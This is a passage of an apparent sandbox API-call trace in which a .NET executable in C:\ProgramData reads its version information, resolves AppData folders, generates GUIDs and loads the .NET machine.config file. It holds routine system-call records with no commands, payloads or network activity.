pBlock=0x21b8bc4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x47ebf8, puLen=0x47ebf4 | out: lplpBuffer=0x47ebf8*=0x21b8d98, puLen=0x47ebf4) returned 1 [0079.282] VerQueryValueW (in: pBlock=0x21b8bc4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x47ebf8, puLen=0x47ebf4 | out: lplpBuffer=0x47ebf8*=0x21b8dcc, puLen=0x47ebf4) returned 1 [0079.282] VerQueryValueW (in: pBlock=0x21b8bc4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x47ebf8, puLen=0x47ebf4 | out: lplpBuffer=0x47ebf8*=0x21b8e60, puLen=0x47ebf4) returned 1 [0079.282] VerQueryValueW (in: pBlock=0x21b8bc4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x47ebf8, puLen=0x47ebf4 | out: lplpBuffer=0x47ebf8*=0x21b8e90, puLen=0x47ebf4) returned 1 [0079.282] VerQueryValueW (in: pBlock=0x21b8bc4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x47ebf8, puLen=0x47ebf4 | out: lplpBuffer=0x47ebf8*=0x21b8ec8, puLen=0x47ebf4) returned 1 [0079.282] VerQueryValueW (in: pBlock=0x21b8bc4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x47ebf8, puLen=0x47ebf4 | out: lplpBuffer=0x47ebf8*=0x21b8cb8, puLen=0x47ebf4) returned 1 [0079.283] VerQueryValueW (in: pBlock=0x21b8bc4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x47ebf8, puLen=0x47ebf4 | out: lplpBuffer=0x47ebf8*=0x21b8e28, puLen=0x47ebf4) returned 1 [0079.283] VerQueryValueW (in: pBlock=0x21b8bc4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x47ebf8, puLen=0x47ebf4 | out: lplpBuffer=0x47ebf8*=0x0, puLen=0x47ebf4) returned 0 [0079.283] VerQueryValueW (in: pBlock=0x21b8bc4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x47ebf8, puLen=0x47ebf4 | out: lplpBuffer=0x47ebf8*=0x0, puLen=0x47ebf4) returned 0 [0079.283] VerQueryValueW (in: pBlock=0x21b8bc4, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x47ebec, puLen=0x47ebe8 | out: lplpBuffer=0x47ebec*=0x21b8c60, puLen=0x47ebe8) returned 1 [0079.283] VerLanguageNameW (in: wLang=0x0, szLang=0x47e97c, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0079.285] VerQueryValueW (in: pBlock=0x21b8bc4, lpSubBlock="\\", lplpBuffer=0x47ebfc, puLen=0x47ebf8 | out: lplpBuffer=0x47ebfc*=0x21b8bec, puLen=0x47ebf8) returned 1 [0079.378] CoTaskMemAlloc (cb=0x20c) returned 0x8eb758 [0079.378] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x8eb758 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0079.380] CoTaskMemFree (pv=0x8eb758) [0079.380] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x47e71c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpFilePart=0x0) returned 0x2d [0079.380] CoTaskMemAlloc (cb=0x20c) returned 0x8eb758 [0079.380] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x8eb758 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0079.382] CoTaskMemFree (pv=0x8eb758) [0079.382] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x47e71c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFilePart=0x0) returned 0x2b [0079.387] CoCreateGuid (in: pguid=0x47e4d4 | out: pguid=0x47e4d4*(Data1=0x95f42dfa, Data2=0x39ea, Data3=0x4250, Data4=([0]=0x9b, [1]=0x27, [2]=0x75, [3]=0x8c, [4]=0x84, [5]=0x4c, [6]=0xb6, [7]=0x90))) returned 0x0 [0079.387] CoCreateGuid (in: pguid=0x47e4d4 | out: pguid=0x47e4d4*(Data1=0x7178bec1, Data2=0x659b, Data3=0x480e, Data4=([0]=0xb0, [1]=0x6e, [2]=0x2f, [3]=0x18, [4]=0x34, [5]=0x87, [6]=0xba, [7]=0x28))) returned 0x0 [0079.388] CoCreateGuid (in: pguid=0x47e4d4 | out: pguid=0x47e4d4*(Data1=0x1b97e129, Data2=0x865d, Data3=0x4157, Data4=([0]=0xb7, [1]=0x3d, [2]=0x31, [3]=0xe5, [4]=0x49, [5]=0xc1, [6]=0xd6, [7]=0xc2))) returned 0x0 [0079.388] CoCreateGuid (in: pguid=0x47e4d4 | out: pguid=0x47e4d4*(Data1=0xcc7c4344, Data2=0x1070, Data3=0x4a04, Data4=([0]=0x89, [1]=0xc1, [2]=0x54, [3]=0xd9, [4]=0x8f, [5]=0x87, [6]=0xaf, [7]=0x5c))) returned 0x0 [0079.388] CoCreateGuid (in: pguid=0x47e4d4 | out: pguid=0x47e4d4*(Data1=0x74731264, Data2=0xbdd, Data3=0x42a3, Data4=([0]=0x82, [1]=0x0, [2]=0x6d, [3]=0x0, [4]=0xea, [5]=0xc2, [6]=0x7b, [7]=0x1c))) returned 0x0 [0079.388] CoCreateGuid (in: pguid=0x47e4d4 | out: pguid=0x47e4d4*(Data1=0xe29d35d2, Data2=0xb6c4, Data3=0x4eaa, Data4=([0]=0x84, [1]=0xcf, [2]=0x2, [3]=0xac, [4]=0xd2, [5]=0xce, [6]=0x2a, [7]=0x9))) returned 0x0 [0079.388] CoCreateGuid (in: pguid=0x47e4d4 | out: pguid=0x47e4d4*(Data1=0x4d4e8728, Data2=0x2c00, Data3=0x43b9, Data4=([0]=0xbc, [1]=0xae, [2]=0x46, [3]=0xba, [4]=0xa4, [5]=0x1d, [6]=0x36, [7]=0x90))) returned 0x0 [0079.388] CoCreateGuid (in: pguid=0x47e4d4 | out: pguid=0x47e4d4*(Data1=0xab2fb5ea, Data2=0x2962, Data3=0x43b4, Data4=([0]=0xad, [1]=0x73, [2]=0x1a, [3]=0x15, [4]=0xef, [5]=0x68, [6]=0xec, [7]=0x89))) returned 0x0 [0079.388] CoCreateGuid (in: pguid=0x47e4d4 | out: pguid=0x47e4d4*(Data1=0x2e50aa06, Data2=0xd3f6, Data3=0x4151, Data4=([0]=0x95, [1]=0xca, [2]=0xde, [3]=0x34, [4]=0x98, [5]=0x56, [6]=0x39, [7]=0x6e))) returned 0x0 [0079.388] CoCreateGuid (in: pguid=0x47e4d4 | out: pguid=0x47e4d4*(Data1=0x9def1a7f, Data2=0x687a, Data3=0x48b3, Data4=([0]=0x88, [1]=0x2a, [2]=0xe8, [3]=0x7c, [4]=0xb6, [5]=0x3f, [6]=0x26, [7]=0xd2))) returned 0x0 [0079.388] CoCreateGuid (in: pguid=0x47e4d4 | out: pguid=0x47e4d4*(Data1=0x563d4fdd, Data2=0x62b6, Data3=0x481c, Data4=([0]=0x90, [1]=0x2, [2]=0xb0, [3]=0x4, [4]=0xbb, [5]=0x2a, [6]=0x3, [7]=0xd))) returned 0x0 [0079.388] CoCreateGuid (in: pguid=0x47e4d4 | out: pguid=0x47e4d4*(Data1=0x5f5ef8bb, Data2=0xb046, Data3=0x4cc2, Data4=([0]=0xa9, [1]=0x28, [2]=0xcf, [3]=0x83, [4]=0x49, [5]=0xb, [6]=0x5c, [7]=0x74))) returned 0x0 [0079.391] CoCreateGuid (in: pguid=0x47e5f8 | out: pguid=0x47e5f8*(Data1=0xf6cb979, Data2=0xa8c6, Data3=0x4ef8, Data4=([0]=0xb8, [1]=0x15, [2]=0x3f, [3]=0xec, [4]=0xc3, [5]=0x7e, [6]=0x3d, [7]=0x92))) returned 0x0 [0079.391] CoCreateGuid (in: pguid=0x47e5f8 | out: pguid=0x47e5f8*(Data1=0x22f423c5, Data2=0xc27, Data3=0x4915, Data4=([0]=0x92, [1]=0x9b, [2]=0x38, [3]=0xb2, [4]=0x3e, [5]=0xdb, [6]=0x62, [7]=0xe6))) returned 0x0 [0079.391] CoCreateGuid (in: pguid=0x47e5f8 | out: pguid=0x47e5f8*(Data1=0xcd12d6d1, Data2=0x73a6, Data3=0x403f, Data4=([0]=0x94, [1]=0x23, [2]=0x10, [3]=0xce, [4]=0x16, [5]=0x54, [6]=0xf1, [7]=0x4a))) returned 0x0 [0079.499] GetCurrentProcess () returned 0xffffffff [0079.500] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x47ea4c | out: TokenHandle=0x47ea4c*=0x270) returned 1 [0079.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x47e52c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0079.504] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x47ea4c | out: lpFileInformation=0x47ea4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0079.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x47e4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0079.505] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x47ea4c | out: lpFileInformation=0x47ea4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0079.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x47e484, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0079.506] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x47e978) returned 1 [0079.507] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x274 [0079.507] GetFileType (hFile=0x274) returned 0x1 [0079.507] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x47e974) returned 1 [0079.507] GetFileType (hFile=0x274) returned 0x1 [0079.514] GetFileSize (in: hFile=0x274, lpFileSizeHigh=0x47ea40 | out: lpFileSizeHigh=0x47ea40*=0x0) returned 0x8c8f [0079.515] ReadFile (in: hFile=0x274, lpBuffer=0x21ce288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x47e9fc, lpOverlapped=0x0 | out: lpBuffer=0x21ce288*, lpNumberOfBytesRead=0x47e9fc*=0x1000, lpOverlapped=0x0) returned 1 [0079.530] ReadFile (in: hFile=0x274, lpBuffer=0x21ce288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x47e898, lpOverlapped=0x0 | out: lpBuffer=0x21ce288*, lpNumberOfBytesRead=0x47e898*=0x1000, lpOverlapped=0x0) returned 1 [0079.531] ReadFile (in: hFile=0x274, lpBuffer=0x21ce288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x47e74c, lpOverlapped=0x0 | out: lpBuffer=0x21ce288*, lpNumberOfBytesRead=0x47e74c*=0x1000, lpOverlapped=0x0) returned 1 [0079.532] ReadFile (in: hFile=0x274, lpBuffer=0x21ce288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x47e74c, lpOverlapped=0x0 | out: lpBuffer=0x21ce288*, lpNumberOfBytesRead=0x47e74c*=0x1000, lpOverlapped=0x0) returned 1 [0079.532] ReadFile (in: hFile=0x274, lpBuffer=0x21ce288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x47e74c, lpOverlapped=0x0 | out: lpBuffer=0x21ce288*, lpNumberOfBytesRead=0x47e74c*=0x1000, lpOverlapped=0x0) returned 1 [0079.532] ReadFile (in: hFile=0x274, lpBuffer=0x21ce288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x47e684, lpOverlapped=0x0 | out: lpBuffer=0x21ce288*, lpNumberOfBytesRead=0x47e684*=0x1000, lpOverlapped=0x0) returned 1 [0079.535] ReadFile (in: hFile=0x274, lpBuffer=0x21ce288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x47e800, lpOverlapped=0x0 | out: lpBuffer=0x21ce288*, lpNumberOfBytesRead=0x47e800*=0x1000, lpOverlapped=0x0) returned 1 [0079.536] ReadFile (in: hFile=0x274, lpBuffer=0x21ce288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x47e714, lpOverlapped=0x0 | out: lpBuffer=0x21ce288*, lpNumberOfBytesRead=0x47e714*=0x1000, lpOverlapped=0x0) returned 1 [0079.536] ReadFile (in: hFile=0x274, lpBuffer=0x21ce288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x47e714, lpOverlapped=0x0 | out: lpBuffer=0x21ce288*, lpNumberOfBytesRead=0x47e714*=0xc8f, lpOverlapped=0x0) returned 1 [0079.536] ReadFile (in: hFile=0x274, lpBuffer=0x21ce288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x47e7d4, lpOverlapped=0x0 | out: lpBuffer=0x21ce288*, lpNumberOfBytesRead=0x47e7d4*=0x0, lpOverlapped=0x0) returned 1 [0079.537] CloseHandle (hObject=0x274) returned 1 [0079.537] GetCurrentProcess () returned 0xffffffff [0079.537] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x47eb80 | out: TokenHandle=0x47eb80*=0x274) returned 1 [0079.538] GetCurrentProcess () returned 0xffffffff [0079.538] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x47eb80 | out: TokenHandle=0x47eb80*=0x268) returned 1 [0079.539] GetCurrentProcess () returned 0xffffffff [0079.539] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x47ea4c | out: TokenHandle=0x47ea4c*=0x278) returned 1 [0079.539] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\images.exe.config" (normalized: "c:\\programdata\\images.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x47ea4c | out: lpFileInformation=0x47ea4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0079.539] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\images.exe.config", nBufferLength=0x105, lpBuffer=0x47e4f8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\images.exe.config", lpFilePart=0x0) returned 0x20 [0079.539] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\images.exe.config" (normalized: "c:\\programdata\\images.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x47ea4c | out: lpFileInformation=0x47ea4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0079.539] GetCurrentProcess () returned 0xffffffff [0079.540] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x47eb80 | out: TokenHandle=0x47eb80*=0x27c) returned 1 [0079.540] GetCurrentProcess () returned 0xffffffff [0079.540] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x47eb80 | out: TokenHandle=0x47eb80*=0x280) returned 1 [0079.541] GetCurrentProcess () returned 0xffffffff [0079.541] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x47eb84 | out: TokenHandle=0x47eb84*=0x284) returned 1 [0079.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x47e630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0079.541] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x47eb84 | out: lpFileInformation=0x47eb84*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0079.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x47e5bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0079.542] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x47eab0) returned 1 [0079.542] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0079.543] GetFileType (hFile=0x288) returned 0x1 [0079.543] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x47eaac) returned 1 [0079.543] GetFileType (hFile=0x288) returned 0x1 [0079.544] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x47eb78 | out: lpFileSizeHigh=0x47eb78*=0x0) returned 0x8c8f [0079.544] ReadFile (in: hFile=0x288, lpBuffer=0x21e6c70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x47eb34, lpOverlapped=0x0 | out: lpBuffer=0x21e6c70*, lpNumberOfBytesRead=0x47eb34*=0x1000, lpOverlapped=0x0) returned 1 [0079.544] ReadFile (in: hFile=0x288, lpBuffer=0x21e6c70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x47e9d0, lpOverlapped=0x0 | out: lpBuffer=0x21e6c70*, lpNumberOfBytesRead=0x47e9d0*=0x1000, lpOverlapped=0x0) returned 1 [0079.544] ReadFile (in: hFile=0x288, lpBuffer=0x21e6c70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x47e884, lpOverlapped=0x0 | out: lpBuffer=0x21e6c70*, lpNumberOfBytesRead=0x47e884*=0x1000, lpOverlapped=0x0) returned 1 [0079.544] ReadFile (in: hFile=0x288, lpBuffer=0x21e6c70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x47e884, lpOverlapped=0x0 | out: lpBuffer=0x21e6c70*, lpNumberOfBytesRead=0x47e884*=0x1000, lpOverlapped=0x0) returned 1 [0079.545] ReadFile (in: hFile=0x288, lpBuffer=0x21e6c70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x47e884, lpOverlapped=0x0 | out: lpBuffer=0x21e6c70*, lpNumberOfBytesRead=0x47e884*=0x1000, lpOverlapped=0x0) returned 1 [0079.545] ReadFile (in: hFile=0x288, lpBuffer=0x21e6c70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x47e7bc, lpOverlapped=0x0 | out: lpBuffer=0x21e6c70*, lpNumberOfBytesRead=0x47e7bc*=0x1000, lpOverlapped=0x0) returned 1 [0079.545] CloseHandle (hObject=0x288) returned 1 [0079.546] GetCurrentProcess () returned 0xffffffff [0079.546] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x47eb40 | out: TokenHandle=0x47eb40*=0x288) returned 1 [0079.546] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\images.exe.config", nBufferLength=0x105, lpBuffer=0x47e5ec, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\images.exe.config", lpFilePart=0x0) returned 0x20 [0079.546] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\images.exe.config" (normalized: "c:\\programdata\\images.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x47eb40 | out: lpFileInformation=0x47eb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0079.546] GetCurrentProcess () returned 0xffffffff [0079.546] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x47eafc | out: TokenHandle=0x47eafc*=0x28c) returned 1 [0079.547] GetCurrentProcess () returned 0xffffffff [0079.547] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x47eab8 | out: TokenHandle=0x47eab8*=0x290) returned 1 [0079.548] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\images.exe.config", nBufferLength=0x105, lpBuffer=0x47e66c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\images.exe.config", lpFilePart=0x0) returned 0x20 [0079.548] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\images.exe.config", nBufferLength=0x105, lpBuffer=0x47e618, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\images.exe.config", lpFilePart=0x0) returned 0x20 [0079.548] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\images.exe", nBufferLength=0x105, lpBuffer=0x47e674, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\images.exe", lpFilePart=0x0) returned 0x19 [0079.548] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\images.exe", nBufferLength=0x105, lpBuffer=0x47e5ec, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\images.exe", lpFilePart=0x0) returned 0x19 [0079.548] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\images.exe", nBufferLength=0x105, lpBuffer=0x47e644, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\images.exe", lpFilePart=0x0) returned 0x19 [0079.548] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x47eaa4) returned 1 [0079.548] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe"), fInfoLevelId=0x0, lpFileInformation=0x47eb20 | out: lpFileInformation=0x47eb20*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74793450, ftCreationTime.dwHighDateTime=0x1d6a092, ftLastAccessTime.dwLowDateTime=0x74793450, ftLastAccessTime.dwHighDateTime=0x1d6a092, ftLastWriteTime.dwLowDateTime=0x127e2500, ftLastWriteTime.dwHighDateTime=0x1d6a090, nFileSizeHigh=0x0, nFileSizeLow=0xb7400)) returned 1 [0079.548] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x47eaa0) returned 1 [0079.548] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\ProgramData\\images.exe", lpdwHandle=0x47eb94 | out: lpdwHandle=0x47eb94) returned 0x6ac [0079.549] GetFileVersionInfoW (in: lptstrFilename="C:\\ProgramData\\images.exe", dwHandle=0x0, dwLen=0x6ac, lpData=0x21f9458 | out: lpData=0x21f9458) returned 1 [0079.549] VerQueryValueW (in: pBlock=0x21f9458, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x47eb68, puLen=0x47eb64 | out: lplpBuffer=0x47eb68*=0x21f94f4, puLen=0x47eb64) returned 1 [0079.549] VerQueryValueW (in: pBlock=0x21f9458, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x47eae8, puLen=0x47eae4 | out: lplpBuffer=0x47eae8*=0x21f9594, puLen=0x47eae4) returned 1 [0079.549] VerQueryValueW (in: pBlock=0x21f9458, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x47eae8, puLen=0x47eae4 | out: lplpBuffer=0x47eae8*=0x21f95c4, puLen=0x47eae4) returned 1 [0079.549] VerQueryValueW (in: pBlock=0x21f9458, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x47eae8, puLen=0x47eae4 | out: lplpBuffer=0x47eae8*=0x21f95f8, puLen=0x47eae4) returned 1 [0079.549] VerQueryValueW (in: pBlock=0x21f9458, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x47eae8, puLen=0x47eae4 | out: lplpBuffer=0x47eae8*=0x21f962c, puLen=0x47eae4) returned 1 [0079.549] VerQueryValueW (in: pBlock=0x21f9458, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x47eae8, puLen=0x47eae4 | out: lplpBuffer=0x47eae8*=0x21f9660, puLen=0x47eae4) returned 1 [0079.549] VerQueryValueW (in: pBlock=0x21f9458, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x47eae8, puLen=0x47eae4 | out: lplpBuffer=0x47eae8*=0x21f96f4, puLen=0x47eae4) returned 1 [0079.549] VerQueryValueW (in: pBlock=0x21f9458, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x47eae8, puLen=0x47eae4 | out: lplpBuffer=0x47eae8*=0x21f9724, puLen=0x47eae4) returned 1 [0079.549] VerQueryValueW (in: pBlock=0x21f9458, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x47eae8, puLen=0x47eae4 | out: lplpBuffer=0x47eae8*=0x21f975c, puLen=0x47eae4) returned 1 [0079.549] VerQueryValueW (in: pBlock=0x21f9458, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x47eae8, puLen=0x47eae4 | out: lplpBuffer=0x47eae8*=0x21f954c, puLen=0x47eae4) returned 1 [0079.549] VerQueryValueW (in: pBlock=0x21f9458, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x47eae8, puLen=0x47eae4 | out: lplpBuffer=0x47eae8*=0x21f96bc, puLen=0x47eae4) returned 1 [0079.549] VerQueryValueW (in: pBlock=0x21f9458, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x47eae8, puLen=0x47eae4 | out: lplpBuffer=0x47eae8*=0x0, puLen=0x47eae4) returned 0 [0079.549] VerQueryValueW (in: pBlock=0x21f9458, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x47eae8, puLen=0x47eae4 | out: lplpBuffer=0x47eae8*=0x0, puLen=0x47eae4) returned 0 [0079.549] 